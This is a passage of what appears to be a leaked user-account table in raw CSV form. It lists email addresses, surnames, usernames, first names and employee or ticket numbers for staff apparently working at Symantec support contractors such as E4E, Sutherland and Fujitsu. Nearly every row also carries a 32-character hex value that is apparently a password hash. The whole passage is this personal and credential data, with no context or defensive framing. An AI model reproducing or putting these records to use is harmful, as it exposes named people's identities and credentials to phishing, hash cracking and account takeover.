afa4467fbc2de7a572fab5f3c9140,Arun,<blank>,Rahul_Arun_Raghani,Rahul,NULL,NULL,NU
LL
068-404f-8495-f12a0e68db93,<blank>,<blank>,saravana.kumar@symantec.ts.e4e.com,E4
E,ebc159e4b63a3b80ddcad58d6f7e661b,S,<blank>,Saravanan _ S,Saravanan ,NULL,NULL,
NULL
498-4ddd-b56c-f7bfa80e268a,<blank>,<blank>,amit.d@symantec.ts.e4e.com,E4E,b62a00
953530236ba5088050a35c9e5c,Dewagan,<blank>,Amit_ Dewagan,Amit,NULL,NULL,NULL
de9-461e-83d1-e7f7f8b5410c,<blank>,<blank>,md.shujauddeen@symantec.ts.e4e.com,E4
E,6e8743935ef4d90236423ef812172810,Shujauddeen A,<blank>,Mohammed_Shujauddeen,Mo
hammed,NULL,NULL,NULL
0a0-4dc2-9d65-67b1700769b1,<blank>,<blank>,md.akbar@symantec.ts.e4e.com,E4E,8511
ab1b78eae101e6e99c22b0048bc9,Ali Azhar,<blank>,Mohammed_ Ali,Mohammed,NULL,NULL,
NULL
d48-4d03-b951-f58c3725136a,<blank>,<blank>,Rahul_Vasani@SUTH.COM,Sutherland,68d7
9191cdefc4bf183644cf13b18a54,Mukesh,<blank>,Rahul_Mukesh_Vasani,Rahul,NULL,NULL,
NULL
13e-4acf-8d03-4ebe3319419f,<blank>,<blank>,delphine.dubuet@nl.fujitsu.com,Fujits
u Services,777bb2c9128c1b7af98802cd38d78736,Dubuet,<blank>,Delphine_Dubuet,Delph
ine,NULL,NULL,NULL
f3d-44f9-932a-1bf851e2f314,<blank>,<blank>,miyuki@ipcdoctor.co.kr,Ipcdoctor.co.k
r,fa3b51a9907648460ab5126f67973078,takashima,<blank>,miyuki_takashima,miyuki,NUL
L,NULL,NULL
9cf0-49d8-b220-c6064668d0bd,bpr-27-05-10,INC182175,tools_id@symantec.suth.com,su
therland,c11accc323cee291f71c6032c55000e8,Pua,<blank>,089693,Sigmund Paul B,NULL
,NULL,NULL
9f3-4749-9484-399c4b93f75a,<blank>,<blank>,sue@ipcdoctor.co.kr,Ipcdoctor.co.kr,f
5202f43f42f251f519632f3e2b03967,nishihara,<blank>,sue_nishihara,sue,NULL,NULL,NU
LL
212-49c2-9499-c3946f9147cb,<blank>,<blank>,malvin.antony@e4e.com,E4E,34b01a80db6
b02638cc69fe71a6b06f6,Viego,<blank>,Malvin_Viego,Malvin,NULL,NULL,NULL
47d-4065-afa1-71baa236b22a,<blank>,<blank>,suresh.kumar@ts.e4e.com,E4E,fcbe76a69
e88a571e0677dc95e486dd9,Kumar,<blank>,Suresh_Kumar,Suresh,NULL,NULL,NULL
7273-4e65-8376-086adf79cbb4,<blank>,2626976,tools_id@symantec.suth.com,Sutherlan
d,75be32df27610cd7e9d7477279d8576c,David,<blank>,090605,Manoj,NULL,NULL,NULL
6234-45fd-bc43-aabd54008464,"CRQ000000602119 CLNP Mar22,2012",999-999-9999,tools
_id@symantec.suth.com,Sutherland,1f23f6c7f29b37697c040dafd019f901,Canoy,<blank>,
222556,Manny,NULL,NULL,NULL
c5c2-4156-9379-a25b666aa689,CRQ000000439605--VMD--06/12/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,77b4f7c17116a3f60f3e3e39a309f373,Pedregosa,<blank>,12
2792,Irene Mae Campos,NULL,NULL,NULL
8ae-4c57-bf53-670c08913e25,<blank>,<blank>,sujatha.g@symantects.chnts.e4e.com,E4
E,3985cfed0f505cbd40894abb8214f52c,Ganesan,<blank>,Sujatha_Ganesan,Sujatha,NULL,
NULL,NULL
d32-4ec7-a7f5-d1a79c8f88f4,<blank>,<blank>,kalaiarasan.r@symantects.chnts.e4e.co
,E4E,b5454839c1471f33436bc83ed12cb614,Radhakrishnan,<blank>,Kalaiarsan_Radhakris
hnan,Kalaiarsan,NULL,NULL,NULL
822-4517-8d17-632a3dd197c2,<blank>,<blank>,satheesh.r@symantects.chnts.e4e.com,E
4E,4a3cf846fe53dd74961ac07f7b605300,Rajenderan,<blank>,Satheesh _Rajenderan,Sath
eesh ,NULL,NULL,NULL
6c9-46b0-a10e-1dabd09bbc6d,<blank>,<blank>,Dipesh.r@symantects.chnts.e4e.com,E4E
,40d0c6086e3d9107468210c1241b2d18,Jagatia,<blank>,Dipesh_Jagatia,Dipesh,NULL,NUL
L,NULL
4ac-449f-83ca-53ec827ce1bf,<blank>,<blank>,balaji.grajan@symantects.chnts.e4e.co
,E4E,36fe3d3ea8a34ba07238ff2187eee881,Govindarajan,<blank>,Balaji_Govindarajan,B
alaji,NULL,NULL,NULL
137-4ae7-b120-da0448a7ac26,<blank>,<blank>,harikiran.b@symantects.chnts.e4e.com,
E4E,d2d9aec69e84f028c12d40066b1ba359,Kiran,<blank>,Hari_Kiran,Hari,NULL,NULL,NUL
L
5a3-4874-b81e-064525855b14,<blank>,<blank>,nithyanandam.v@symantects.chnts.e4e.c
,E4E,5693425710761e8a0b45b9f6eb44fc55,Veerapan,<blank>,Nithyanandam_Veerapan,Nit
hyanandam,NULL,NULL,NULL
2329-4dee-a6bf-436169d3a3ef,"CRQ000000602127 CLNP Mar22,2012",999-999-9999,tools
_id@symantec.suth.com,Sutherland,c0a4bef2dfa48d718a1453accaa80f8c,Carrillo,<blan
k>,222558,ArsenioBenjaminII,NULL,NULL,NULL
b7f-441c-b9f5-448534634ca6,<blank>,090654/2633251,Tools_id@symantec.suth.com,Sym
antec,5d53d2db0ac590d6a8c835158597a833,Jain,<blank>,suresh_jain,Suresh,NULL,NULL
,NULL
a01-4675-9baf-0e6de9f49c00,<blank>,<blank>,janaki.vishwanathan@symantec.ts.e4e.c
,E4E,3ad6c1328891024a4d25925384d9b839,Viswanathan,<blank>,Janaki _Viswanathan,Ja
naki ,NULL,NULL,NULL
9bf8-4962-b055-5288c760d514,"CRQ000000669854 CLNP May 23,2012",000-000-0000,tool
s_id@symantec.suth.com,Sutherland,72ddf349792799a4300abbf2772a8354,Vaishnav,<bla
nk>,225895,Vijay,NULL,NULL,NULL
243-4ddb-81eb-711b01f6ced1,<blank>,<blank>,ruru.koshy@symantec.ts.e4e.com,E4E,c0
6a4c3e7bc18ce9cdec43daf5ae9acb,Koshy ,<blank>,Ruru _Koshy,Ruru ,NULL,NULL,NULL
6f46-437b-9fc7-227d14b4b81f,CRQ000000709695--vmd--26/06/2012,<blank>,louvelle_pa
mintuan@suth.com,sutherland,91d9e40848e0cd4e7cb74e465e168880,Pamintuan,<blank>,2
26458,Louvelle,NULL,NULL,NULL
ddd1-43be-93ae-77d00b54a543,<blank>,<blank>,aleontaritou@symantec.teleperformanc
e.gr,CT - 12/09/2012 - CRQ000000801267,2bb26bddd5e194744b034cc33c1ea347,Leontari
tou,<blank>,229989,Alexandra,NULL,NULL,NULL
06a-46b1-82ca-d5a6c2174187,<blank>,086282,tools_id@symnatec.com,Symantec,3e57dd3
23ab24bdb3d691cc5445f731d,Kasalave,<blank>,harikiran_kasalave,Harikiran,NULL,NUL
L,NULL
593-4807-9e7c-076302ed1701,<blank>,<blank>,arvind.Kuppalu@symantec.ts.e4e.com,E4
E,79ec2a81b26a89db3b0028d33aab71c0,K T,<blank>,Arvind _K,Arvind ,NULL,NULL,NULL
949-4f75-b48b-0ab3945893a6,<blank>,<blank>,rizwan.sheriff@symantec.ts.e4e.com,E4
E,bc9c36bbff591d7f5de39004053a0e78,Sheriff,<blank>,Rizwan _Sheriff,Rizwan ,NULL,
NULL,NULL
166-4bb9-8625-52ad0f04a5c3,<blank>,<blank>,roopa.srinivas@symantec.ts.e4e.com,E4
E,dee96c3de4f0c0d5465e4069982bc4c3,Srinivas,<blank>,Roopa _Srinivas,Roopa ,NULL,
NULL,NULL
939-498f-b810-82abeca044c8,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,f6f7
37cc499c077630233c64f9d763f2,Kanangot,<blank>,Pramod_Kanangot,Pramod,NULL,NULL,N
ULL
97b2-489a-8e31-f3a86091899a,S_Nagaraj@symantec.com,<blank>,S_Nagaraj@symantec.co
m,SYMANTEC,58d698ef0abae441eaedfdfe0716ec9a,S,<blank>,114413,Nagaraj,NULL,NULL,N
ULL
ffb-49af-a52a-c8cfa6b155bb,<blank>,<blank>,Symchatleads@india.iseva.com,E4E,b803
ca3aaa58a3e34b4b74732f3b66f1,Varas Khan,<blank>,Mohammad_VarasKhan,Mohammad,NULL
,NULL,NULL
ffc-421a-8129-cf486fcdbeb9,<blank>,<blank>,pasha.nawaz@symantec.ts.e4e.com,E4E,3
b3d447d52fc1fa6dde6ec6c6691aa2e,Pasha,<blank>,Nawaz _Pasha,Nawaz ,NULL,NULL,NULL
306-4b36-a1ca-fe22a605150c,<blank>,<blank>,Roopa.joy@symantec.ts.e4e.com,E4E,7b7
f2092e7998d2be05a2679240ff873,Joy,<blank>,Roopa _Joy,Roopa ,NULL,NULL,NULL
ea10-4f87-bcf6-c1d4cd629b88,CRQ000000603586--vmd--23/03/2012,<blank>,angelica_fu
ggan@Suth.com,Sutherland,8b7c00f0116dab2c38fffbe967dffae4,Fuggan,<blank>,222665,
Angelica,NULL,NULL,NULL
484-4c07-b589-5717d84f3889,<blank>,85691,Tools_id@symantec.suth.com,Sutherland G
lobal Services,805e252f9f5d97541beb8b966a5d43cc,Othman,<blank>,fadwa_othman,Fadw
a,NULL,NULL,NULL
bb23-44d0-990e-cb2eafe4a16c,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,30488424a2ed0cd5dd85f271ed036f41,KumarV,<blank>,purna_kumarv_cc,Purna,NUL
L,NULL,NULL
401-4e93-94f4-7c86333990c1,<blank>,<blank>,nuwan.shalaka@e4e.com,E4E,ad54a3008cd
812bb5dc0e20ca5bf3885,Shalaka,<blank>,Nuwan_Shalaka,Nuwan,NULL,NULL,NULL
4db-429d-b5f7-e4dc09881ed0,<blank>,<blank>,v.raja@symantec.ts.e4e.com,E4E,00055a
b96aeb67111fa9c3d6d7c2cb9c,V,<blank>,V Raja_V,V Raja,NULL,NULL,NULL
648-48c4-9532-928b3601e7e0,<blank>,<blank>,isaiah.babu@symantec.ts.e4e.com,E4E,9
a6966df4c7d997e57cedb51e74cabd4,Babu,<blank>,Isaiah_Babu,Isaiah,NULL,NULL,NULL
83e-4918-af55-59a16545d70f,<blank>,<blank>,syed.farooq@symantec.ts.e4e.com,E4E,3
b1aa48d553609c3c02f52e94239369d,Farooq,<blank>,Syed _Farooq,Syed ,NULL,NULL,NULL
8e6-40df-8ce0-323a8fa3d2ad,<blank>,<blank>,jaingladish.lj@symantec.ts.e4e.com,E4
E,1301c7083e720f91fb9f33e924c42f51,L J,<blank>,Jaingladish _L,Jaingladish ,NULL,
NULL,NULL
3a2-4258-a3e0-b34287472a9d,<blank>,<blank>,ravichandra.bhuspala@symantec.ts.e4e.
,E4E,74c616e97e689464af6ff78a212b158c,B C,<blank>,Ravichandra_B,Ravichandra,NULL
,NULL,NULL
856-48a4-bcb9-1905a72155da,<blank>,<blank>,syedmohsin.ahmed@symantec.ts.e4e.com,
E4E,8b906c8f88d12b41c625ca9049c75d20,Mohsin,<blank>,Syedmohsin_Mohsin,Syedmohsin
,NULL,NULL,NULL
e25-4418-84f5-ab6261ae528c,<blank>,85804,Tools_id@symantec.suth.com,Sutherland G
lobal Services,78649718273c338f61e1550eab619893,Drake,<blank>,judy_drake,Judy,NU
LL,NULL,NULL
c787-4acf-9bc2-2b8c44fa4a77,<blank>,<blank>,tools_id@symantec.suth.com,Sutherlan
d,fc336c9cc5e5fd12414397f20745ce4d,Narvankar,<blank>,121282,Navin Prakash,NULL,N
ULL,NULL
c46-4333-8d27-89c5969f5af9,<blank>,<blank>,raja.achudhan@ts.e4e.com,E4E,8ba4683c
9a8bcaa844d3a8865e5ec951,Achudhan,<blank>,Raja_Achudhan,Raja,NULL,NULL,NULL
d56b-4949-b13e-ec7464c75225,CRQ000000265666--VMD--26/05/11,000-000,tools_id@syma
ntec.suth.com\xa0\t,Sutherland,dd37364ed7329d7de380adde607b6af6,Kumar,<blank>,11
1483,Suresh,NULL,NULL,NULL
6e5c-471c-b111-eeb4651e6a6d,CRQ000000206842,000-0000,tools_id@symantec.suth.com,
Sutherland,2c715712e92618429e2d11965555a987,Y,<blank>,113271,Vinoy,NULL,NULL,NUL
L
e8f-4920-91f7-1b99eecdb6b5,<blank>,<blank>,raghavendra.gudi@symantec.ts.e4e.com,
E4E,7a3ae492860756276a78416d669c6d65,Gudi,<blank>,Raghavendra_Gudi,Raghavendra,N
ULL,NULL,NULL
d6d5-40a9-b55e-03b111d24da2,CRQ000000603589--vmd--23/03/2012,<blank>,rochelle_ha
bacon@Suth.com,Sutherland,15ce39adc5516addecdb508133699ec9,Habacon,<blank>,22266
8,Rochelle,NULL,NULL,NULL
405e-419f-9c2a-a61184431828,CRQ000000603604--vmd--23/03/2012,<blank>,nio_pastor@
Suth.com,Sutherland,ad491e86ce197d81e705ec76e49a3845,Pastor,<blank>,222673,Nio,N
ULL,NULL,NULL
3bf-4dcb-9219-689cc2b98301,<blank>,<blank>,sathish.jayaramaial@symantec.ts.e4e.c
,E4E,07c789d7f22f34602d331ef1e219a5a9,J,<blank>,Sathish _J,Sathish ,NULL,NULL,NU
LL
819-40e0-b9e5-5ba55a58a5b3,<blank>,<blank>,rakesh.wahengbam@symantec.ts.e4e.com,
E4E,9e91654285af8aab29028d989c862e50,W,<blank>,Rakesh_W,Rakesh,NULL,NULL,NULL
fa1-468d-bb70-dc163fcde1c8,<blank>,<blank>,shankar.narayan@symantec.ts.e4e.com,E
4E,e367ab11740d6c622d2d1e0eb97934dd,Narayan,<blank>,Shankar_Narayan,Shankar,NULL
,NULL,NULL
e08b-462c-a986-266e917fb78f,CRQ000000621100 Sp 9 April 2012,000-0000,Zainab_Aziz
@symantec.suth.com,Sutherland,0b940efe24fc19a6da0f4c31f00625a8,Aziz,<blank>,2230
27,Zainab,NULL,NULL,NULL
a4f-4743-872b-677fc9d27de5,<blank>,<blank>,praveen.chavan@symantec.ts.e4e.com,E4
E,fda82079567174191dba38dd1ea31072,Chavan,<blank>,Praveen _ Chavan,Praveen ,NULL
,NULL,NULL
f64-4a2a-8089-7a887fd157de,<blank>,<blank>,nawaz.pasha@symantec.ts.e4e.com,E4E,2
45a1c747c597588a48d62bd8cccfbc0,Pasha,<blank>,Nawaz _ Pasha,Nawaz ,NULL,NULL,NUL
L
c7b-4d64-a3ec-d06f4486a371,<blank>,<blank>,ebith.vadakkayil@symantec.ts.e4e.com,
E4E,fdb7fc114d31d18be3b972df77efc4d6,Vadakkayil,<blank>,Ebith _ Vadakkayil,Ebith
,NULL,NULL,NULL
1d5-4888-b36b-37065eb6bfbc,<blank>,<blank>,rajmohan.s@symantec.ts.e4e.com,E4E,eb
82f748faee946f927e3e7e8d328188,Mohan,<blank>,Raj _Mohan,Raj ,NULL,NULL,NULL
bb7-4b25-b6d9-526888c9200b,<blank>,<blank>,prabhakar.eswaran@symantec.ts.e4e.com
,E4E,730a0f9307f7aaa10eeb7b9f12560304,Eshwaran,<blank>,Prabhakar_Eshwaran,Prabha
kar,NULL,NULL,NULL
428-49ff-9943-d75764993794,<blank>,090556/2614952,Tools_id@symantec.suth.com,Sym
antec,20a1e20454844f2ee622c829806691e7,Rarama,<blank>,girlie_rarama,Girlie,NULL,
NULL,NULL
5c7d-41aa-8bf1-f6c8f5b66b77,<blank>,<blank>,Carlos_Nonan@SPI.COM,PM - 6/14/2012
- CRQ000000694470,798ea1309e254ba26307f2b871ddab5d,Nonan,<blank>,226710,Carlos ,
NULL,NULL,NULL
947-4114-bba7-e22c12f5333d,<blank>,<blank>,md.muheed@symantec.ts.e4e.com,E4E,75e
742b8e78546a191c074e0c71f0236,Muheed,<blank>,Mohammed_ Muheed,Mohammed,NULL,NULL
,NULL
41b-430a-a69b-598c97470860,<blank>,<blank>,anke.fischer@nl.fujitsu.com,Fujitsu S
ervices,d66498f1d52b72e4f6017c9887908028,Fischer,<blank>,Anke_Fischer,Anke,NULL,
NULL,NULL
caa-45b2-867a-5595ebff9fc9,<blank>,<blank>,federico.johnson@nl.fujitsu.com,Fujit
su Services,e94bf2a154bde2d60bbb1656eb61b103,Johnson,<blank>,Federico_Johnson,Fe
derico,NULL,NULL,NULL
037-40c6-9beb-b323af9a682b,<blank>,<blank>,Rahul_R@SUTH.COM,Sutherland,9cd7722d9
503eedf6ee835b894864d77,R,<blank>,Rahul_R,Rahul,NULL,NULL,NULL
017-48b2-9dfa-27bf764d8879,<blank>,<blank>,Estela.LariosGonzales@nl.fujitsu.com,
Fujitsu Services,22669d69ed78caa73e04b6b00b8ab462,Larios,<blank>,Estela_Larios,E
stela,NULL,NULL,NULL
d94-45d9-8a01-1af74bbe4e39,<blank>,<blank>,Rahul_Ramanan@SUTH.COM,Sutherland,81a
d6c55f89b04f31a273c9bff43d737,Ramanan,<blank>,Rahul_Ramanan,Rahul,NULL,NULL,NULL
35d-4302-9a5d-7875f612dd8f,<blank>,<blank>,Antonio.delgado@nl.fujitsu.com,Archiv
ed Fujitsu,0f59af5d4c5b5e98a0cd8408a81a86b5,Delgado,<blank>,Antonio_Delgado,Anto
nio,NULL,NULL,NULL
184-4060-b291-4efdc5d5bd42,<blank>,<blank>,michael.kleespies@nl.fujitsu.com,Fuji
tsu Services,9f4c6552608fce29167c2ec1bad67c1f,Kleespies,<blank>,Michael_Kleespie
s,Michael,NULL,NULL,NULL
e64f-48a1-9aa3-9cd591c0b7cf,<blank>,INC213479,tools_id@symantec.suth.com,Sutherl
and,a19aa9d1c8578e06701899dae03692b9,Nath Selvam Veeraraghavan,<blank>,074066,Ni
ranjan,NULL,NULL,NULL
605-4edf-b5b8-31538c71c81b,<blank>,<blank>,eric.jean@nl.fujitsu.com,Fujitsu Serv
ices,d50573f4d5c26a4b954058744d5c7ae9,Jean,<blank>,Eric_Jean,Eric,NULL,NULL,NULL
6b3-4f94-b9a0-251f135e7a5c,<blank>,<blank>,christian.sakalis@nl.fujitsu.com,Fuji
tsu Services,167cd22307b32ec5b451afbe91eb1846,Sakalis,<blank>,Christian_Sakalis,
Christian,NULL,NULL,NULL
db7-4101-919b-88db03aa04ab,<blank>,<blank>,RajMallesh_SR@SUTH.COM,Sutherland,4cf
9649b835a4b0f7506c56eaa9162db,Mallesh,<blank>,Raj_Mallesh_S_R,Raj,NULL,NULL,NULL
325-4fc1-b6da-0c9821675f08,<blank>,<blank>,mariano.cisco@nl.fujitsu.com,Fujitsu
Services,453495903058edf4c849759b052ad5a2,Cisco,<blank>,Mariano_Cisco,Mariano,NU
LL,NULL,NULL
d23-4fdf-b95a-ffa4864e2b0b,<blank>,<blank>,jaldert.maat@nl.fujitsu.com,Fujitsu S
ervices,a5f1e901fbc8910680a10a1788e49284,Maat,<blank>,Jaldert_Maat,Jaldert,NULL,
NULL,NULL
750-41e5-afbf-ffdbb8c1f1ca,<blank>,<blank>,Jasper.lammertink@nl.fujitsu.com,Fuji
tsu Services,c4055acf443cc5b9073bba611e5af714,Lammertink,<blank>,Jasper_Lammerti
nk,Jasper,NULL,NULL,NULL
501-40fb-b2d8-32920521b3d5,<blank>,<blank>,aurelie.le.devedec@nl.fujitsu.com,Fuj
itsu Services,83c1156cde86e0d5b3e514bfe166d4eb,LeDevedec,<blank>,Aurelie_LeDeved
ec,Aurelie,NULL,NULL,NULL
5be-4d8b-8f83-fb6b8fe961cf,<blank>,<blank>,Sarah.Bilka@nl.fujitsu.com,Fujitsu Se
rvices,03e53ce8e82f9915d79c5a5666024d46,Bilka,<blank>,Sarah_Bilka,Sarah,NULL,NUL
L,NULL
85f-4515-b7d8-e425ca8a5f2b,<blank>,<blank>,Olalla.alvarez@nl.fujitsu.com,Fujitsu
Services,4c2015c5cecaa993e8707444f13b31c8,Alvarez,<blank>,Olalla_Alvarez,Olalla
,NULL,NULL,NULL
997-40d0-a2ad-3c2b57afc8ac,<blank>,<blank>,Nicola.Tedoldi@nl.fujitsu.com,Fujitsu
Services,a45abbb5a10ceacad3fa30f7cb66c66e,Tedoldi,<blank>,Nicola_Tedoldi,Nicola
,NULL,NULL,NULL
fdd-4f37-94cd-094eaa808fa9,<blank>,<blank>,Jurgen.knobloch@nl.fujitsu.com,Fujits
u Services,b762888e00964e6b76cbc0d27038faf2,Knobloch,<blank>,Jurgen_Knobloch,Jur
gen,NULL,NULL,NULL
ab1-4daa-be2c-8a66d0c662fc,<blank>,<blank>,Gabriele.patriarca@nl.fujitsu.com,Fuj
itsu Services,9896c2e04d99229acd0081e33eee7c47,Patriarca,<blank>,Gabriele_Patria
rca,Gabriele,NULL,NULL,NULL
4ab-4f04-af6b-4ffa47ad0587,<blank>,<blank>,Rajarajan_Rajendran@suth.com,Sutherla
nd,d41c20386efb9f9af4821052818a3de3,Rajendran,<blank>,Rajarajan_Rajendran,Rajara
jan,NULL,NULL,NULL
3376-4ced-85c0-a44e9b2d7198,CRQ000000709695--vmd--26/06/2012,<blank>,vinoth_i@SU
TH.COM,Sutherland,a10e6527706fad9da50e80d1ef8e0b01,I,<blank>,101839,Vinoth,NULL,
NULL,NULL
64f-48d6-9c69-a83224801998,<blank>,<blank>,Mukesh_Gond@SUTH.COM,Sutherland,a284b
9b5f652f2fc6e2ec590f69fa2a9,Shambhuram,<blank>,Mukesh_Shambhuram_Gond,Mukesh,NUL
L,NULL,NULL
e98-42a3-9ea5-ebde90cdd888,<blank>,<blank>,Mukta_Mathur@SUTH.COM,Sutherland,debb
b83a6b1bc271d277c221e012c13c,Mani,<blank>,Mukta_Mani_Mathur,Mukta,NULL,NULL,NULL
a89-4194-8259-4771681741df,<blank>,<blank>,Muktharunissa_A@SUTH.COM,Sutherland,9
3eb32f400156dbd69f903ee9455fdfe,A,<blank>,Muktharunissa_A,Muktharunissa,NULL,NUL
L,NULL
76e9-461b-a977-6eda515c7c29,CRQ000000439598--VMD--06/11/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,8530d0924e7ab8a0b5e4fbb5ca842c31,Homilda,<blank>,1227
90,Luther James Cadiz,NULL,NULL,NULL
29df-47b6-88fc-6803cea926c2,PM - 8/8/2011,<blank>,tools_id@symantec.suth.com,<bl
ank>,2c3c36d72d4104e77ae6c949ae1bee48,Hembram,<blank>,119316,Anita,NULL,NULL,NUL
L
642-43b2-b3e1-2fc2adc68170,<blank>,<blank>,Nahakpam_Singh@SUTH.COM,Sutherland,c4
4b1caa257d95b408832a5ac02763c1,Boboy,<blank>,Nahakpam_Boboy_Singh,Nahakpam,NULL,
NULL,NULL
fc89-4fad-a8a8-b621920d14bb,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,5eea44a904a6ceac3a62c385f436e4d3,Nadh,<blank>,devendra_nadh_cc,Devendra ,
NULL,NULL,NULL
c6b-4f4c-861d-c5368d46b69d,<blank>,<blank>,NandhiniMonica_M@SUTH.COM,Sutherland,
3c5fc2c396d671d4ff99e81c60736e95,Monica,<blank>,Nandhini_Monica_M,Nandhini,NULL,
NULL,NULL
33d-41c3-8b8f-3f13b2d4a35b,<blank>,2633284,tools_id@symantec.suth.com,Sutherland
,494d3d624d9bdde25a8b03637fb557e2,Amit,<blank>,Narendra_Amit_Bathija,Narendra,NU
LL,NULL,NULL
f3d-47bb-ac03-8acda027ec27,<blank>,<blank>,Navas_V@SUTH.COM,Sutherland,5bbab0a95
27e4bbcdad8f81a2ea5606a,V,<blank>,Navas_V,Navas,NULL,NULL,NULL
2ec-4116-9c4c-803b05e61bce,<blank>,<blank>,Navin_kumar@suth.com,Sutherland,4f216
f349ee136c44ba8b24cfb4609a0,Kumar,<blank>,Navin_Kumar_Vinayak,Navin,NULL,NULL,NU
LL
0d5-40c7-859a-8c83ddbd7d5f,<blank>,<blank>,Nayana_Shirsat@SUTH.COM,Sutherland,91
730af86f21074a74e84b0ef8b7065d,Suryakant,<blank>,Nayana_Suryakant_Shirsat,Nayana
,NULL,NULL,NULL
fd4-4cf7-afd0-6043ed78efe3,<blank>,<blank>,Nazar_Mohsin@SUTH.COM,Sutherland,17fe
cadf2d40954452209d0eae2115af,Mohsin,<blank>,Nazar_Mohsin,Nazar,NULL,NULL,NULL
d3d-4fff-a9ac-5b329bc8b16f,<blank>,<blank>,Nelofur_S@SUTH.COM,Sutherland,8a7f718
f923004998ae640663f669447,S,<blank>,Nelofur_S,Nelofur,NULL,NULL,NULL
4b5-405f-a699-fd5b4e86e863,<blank>,<blank>,Nidhin_Chand@SUTH.COM,Sutherland,f712
624e5f5bb8cf0025d356df980aea,Chand,<blank>,Nidhin_Chand,Nidhin,NULL,NULL,NULL
e2b-416c-8cf2-172d7a98e14f,<blank>,<blank>,Nidhin_ES@SUTH.COM,Sutherland,82c49a3
46be4dda15252a17edadb56ac,E,<blank>,Nidhin_E_S,Nidhin,NULL,NULL,NULL
df3-4600-9c34-f9eee253d705,<blank>,<blank>,Nidhin_Kurien@SUTH.COM,Sutherland,971
3a7e5c53bb411870d0e97515f73fb,Kurien,<blank>,Nidhin_Kurien,Nidhin,NULL,NULL,NULL
8aa0-477c-b28f-52be79808ee5,CRQ000000681057--VMD--01/06/2012,<blank>,tools_id@sy
mantec.suth.com,SUTHERLAND,ba6af07da470e965f344706e7eddbcd6,Gnanaraj,<blank>,226
167,Isaac,NULL,NULL,NULL
784d-4d2b-b8f4-825a1f844d1b,"CRQ000000602130 CLNP Mar22,2012",999-999-9999,tools
_id@symantec.suth.com,Sutherland,f06a028d639001c559a77e017aeea508,Dador,<blank>,
222559,Bernardo,NULL,NULL,NULL
38a-4e67-b211-4caf38540812,<blank>,<blank>,PankajKumarBorah_N@SUTH.COM,Sutherlan
d,5e5fb0b8467f6b557b4f3f62ea1b5c0a,Kumar,<blank>,Pankaj_Kumar_Borah_N,Pankaj,NUL
L,NULL,NULL
85e-4a76-84f4-ba0e10e52275,<blank>,<blank>,PardhaSaradhi_K@SUTH.COM,Sutherland,3
32adf6a25d327b419f62f02f2275f45,Saradhi,<blank>,Pardha_Saradhi_K,Pardha,NULL,NUL
L,NULL
ada-41fd-a730-025fe15ff55b,<blank>,<blank>,ParryVallal_K@SUTH.COM,Sutherland,8a7
a85b255bc051a1a1ec0bfb82b348f,Vallal,<blank>,Parry_Vallal_K,Parry,NULL,NULL,NULL
bb3-4b61-8de6-9727fe6f9a60,<blank>,<blank>,Parthasarathy_R@SUTH.COM,Sutherland,7
016ec196514d1fb03ca96cea58d40dd,R,<blank>,Parthasarathy_R,Parthasarathy,NULL,NUL
L,NULL
050-46f3-bc7f-1bc9dd810e31,<blank>,<blank>,Parvathy_Devi@SUTH.COM,Sutherland,c0c
82c671c8d4f025be25a7ce0e94d92,Girija,<blank>,Parvathy_Girija_Devi,Parvathy,NULL,
NULL,NULL
12b-4ede-9f74-1cd6db4b26bb,<blank>,<blank>,ParvathyR_Kumar@SUTH.COM,Sutherland,2
0e318c30a2db175869d0afb0497e548,R,<blank>,Parvathy_R_Kumar_Reghu_Kumar,Parvathy,
NULL,NULL,NULL
869-4a98-9226-32b4a86316ef,<blank>,2633288,tools_id@symantec.suth.com,Sutherland
,4e9af515eecca4a4af03de90b7296c6f,Mohammed,<blank>,Parvez_Mohammed_Sindhi,Parvez
,NULL,NULL,NULL
3ca-45dc-b107-43bc26c0725e,<blank>,<blank>,Nagaditya_N@SUTH.COM,Sutherland,d244f
acd7c5b55279678221d0d64a487,N,<blank>,Nagaditya_N,Nagaditya,NULL,NULL,NULL
64d-4049-8f14-d5a6cc1dd7ad,<blank>,<blank>,Natasha_Shah@SUTH.COM,Sutherland,fd8f
ab5fdd672c38186d7fb0a45a3125,Nainesh,<blank>,Natasha_Nainesh_Shah,Natasha,NULL,N
ULL,NULL
a5c-4e8e-8a2e-77f443b1da2d,<blank>,<blank>,Navas_Pulikkal@SUTH.COM,Sutherland,51
411491b128d3dfd25d7e2c460fe604,Pulikkal,<blank>,Navas_Pulikkal_Aboo,Navas,NULL,N
ULL,NULL
7f3-44b6-9efd-f22d85423af9,<blank>,<blank>,Nikhil_Jaju@SUTH.COM,Sutherland,fbcca
a04fae4b65b0f7183a748f56d80,Devkishore,<blank>,Nikhil_Devkishore_Jaju,Nikhil,NUL
L,NULL,NULL
507c-4a3d-9b3c-f89809196e62,WS 22-07-2010,INC000000223553,tools_id@symantec.suth
.com,<blank>,4c4616247f570fdceca02db78fee7b5c,Mudhapakha,<blank>,093603,Prasanna
Kumari,NULL,NULL,NULL
93b-401b-836e-cd45d48daa49,<blank>,86310/2633288,Tools_id@symantec.suth.com,"Sut
herland Global Services, Inc.",65fbc521774214f9570a6094a890b83e,Raut,<blank>,chi
rag_raut,Chirag,NULL,NULL,NULL
f34-4361-bc8c-92737796c342,<blank>,<blank>,Nikhil_Kotian@SUTH.COM,Sutherland,239
f09d93688404154829c64e1d269f0,Satish,<blank>,Nikhil_Satish_Kotian,Nikhil,NULL,NU
LL,NULL
65a-44da-aa43-7e31cdbe34cb,<blank>,<blank>,Nikhil_TA@SUTH.COM,Sutherland,3d0e535
287dde2789564ffca916e7816,T,<blank>,Nikhil_T_A,Nikhil,NULL,NULL,NULL
f3a-4fd5-a638-681451fd922b,<blank>,<blank>,NileshAtmaram_Dalvi@SUTH.COM,Sutherla
nd,170ad4999df6ff362fd5c3ea6367db4b,Atmaram,<blank>,Nilesh_Atmaram_Dalvi,Nilesh,
NULL,NULL,NULL
cd6-435d-8bd8-e7e88169c93d,<blank>,<blank>,Nilesh_Yadav@SUTH.COM,Sutherland,9d72
1351b8e73608674353d8a46cc052,Kamtaprasad,<blank>,Nilesh_Kamtaprasad_Yadav,Nilesh
,NULL,NULL,NULL
208-4c36-a28c-e77da47c2421,<blank>,<blank>,Nimesh_Khiara@SUTH.COM,Sutherland,d83
